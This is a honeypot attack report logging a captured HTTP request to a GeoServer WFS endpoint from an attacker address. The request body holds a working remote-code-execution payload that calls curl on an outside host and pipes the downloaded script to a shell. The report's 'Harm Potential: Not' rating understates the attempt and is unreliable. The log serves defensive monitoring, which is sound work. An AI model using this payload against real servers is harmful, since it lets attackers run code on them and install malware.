Attack Report for Detail

Header

Time

2024/09/22, 18:29:48 (GMT)

Transaction ID

0HDULOIIJ0OSVPFB

Service

http

Location

BG (Bulgaria)

Attacker

83.222.191.62

Classification

Web server control

Harm Potential

Not

Description

Web server information control

Content

POST /geoserver/wfs HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: 46.4.222.114:8080
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/xml
Content-Length: 381

<wfs:GetPropertyValue service='WFS' version='2.0.0'
  xmlns:topp='http://www.openplans.org/topp'
  xmlns:fes='http://www.opengis.net/fes/2.0'
  xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='topp:states' />
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl http://154.216.19.60/sh | sh -s geoserver')</wfs:valueReference>
</wfs:GetPropertyValue>

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate